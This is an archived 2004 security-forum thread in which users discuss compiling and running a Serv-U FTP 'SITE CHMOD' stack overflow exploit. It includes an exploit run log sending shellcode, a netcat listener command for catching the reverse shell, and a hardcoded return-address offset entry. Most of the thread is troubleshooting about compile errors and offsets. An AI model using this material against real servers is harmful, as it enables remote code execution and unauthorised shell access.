hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
Pages: 1, 2
Alien
Jan 27 2004, 10:13 AM
QUOTE (Copkill @ Jan 27 2004, 07:31 AM)
i have compiled but become no shell mad.gif

[+] Connect to xxx.xx.xx.172:666 success.
[-] Bind port on xx.xx.xx.xxx:53 error. <----error ???
[-] You must run nc get the shell.
[+] Recv: 220 ready...
[+] Send: USER Cop
[+] Recv: 331 User name okay, need password.
[+] Send: PASS Cop
[+] Recv: 230 User logged in, proceed.
[+] Send: TYPE I
[+] Recv: 200 Type set to I.
[+] Send shellcode 791 bytes.
[+] If you don't have a shell it didn't work.

you must run netcat on port 53:

nc -l -vv -p 53
brOmstar
Jan 27 2004, 12:06 PM
used this one no prob with lcc to compile

/*
* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by kkqq 0x557 org
* exp coded by mslug safechina net
* Jan 25 2004
*/

only chrashes serv-u 4.0.0.4 de @ w2k3 de
SkyRaVeR
Jan 27 2004, 03:20 PM
hmm - sorry 4 newbie question.. but how 2 find the correct offset ?
which dll do I have 2 check ? there were some different ones used (like user32.dll setuapi.dll and) register seems 2 be always the esp.

tried this xploit at my homie but no success with any offset sad.gif
Eltharion
Jan 27 2004, 06:23 PM
Thank you, compiled and working fine.
ufo
Jan 27 2004, 07:09 PM
Thx for this exploit
temp
Jan 28 2004, 08:42 AM
anyone knows where he got those offsets?
{0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL"}, //for all BG win2000 and winxp

this offset worked for me, but i can't find it in any attached services.exe *.DLL
pita
Jan 28 2004, 10:43 AM
why r u searching services.exe, here the overflow is on servudaemon.exe.
phaeton
Jan 28 2004, 02:29 PM
Hes looking for the Windows XP/2000 offset values, which are something native to the kernel itself, not to servu afaik
ellitio
Jan 28 2004, 03:45 PM
can somebody compile this? because i get errors while compiling unsure.gif
jos40
Jan 28 2004, 03:48 PM
Used Lcc too but didn't get it to work.
Only thing was the usage name wink.gif
We keep on practicing tongue.gif
XtrA
Jan 28 2004, 04:20 PM
i get errors when i try to compile..
can anyone upload compiled version?
Raedemer
Jan 28 2004, 05:43 PM
It seems that the shellcode isn't working, becouse I got a message at NetCat, but I don't get a shell.
I tried it at home with winxp sp1
gamesen
Mar 1 2004, 03:41 PM
i still keep having problems.. but ooh well, from other ppl it worked perfect..
alkausar
Mar 2 2004, 01:40 AM
shellcode..?????
just type servu, and shell will come...
maybe.... biggrin.gif biggrin.gif biggrin.gif biggrin.gif
RizL4
Apr 1 2004, 05:44 AM
errors when i try to compile

plz someone?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.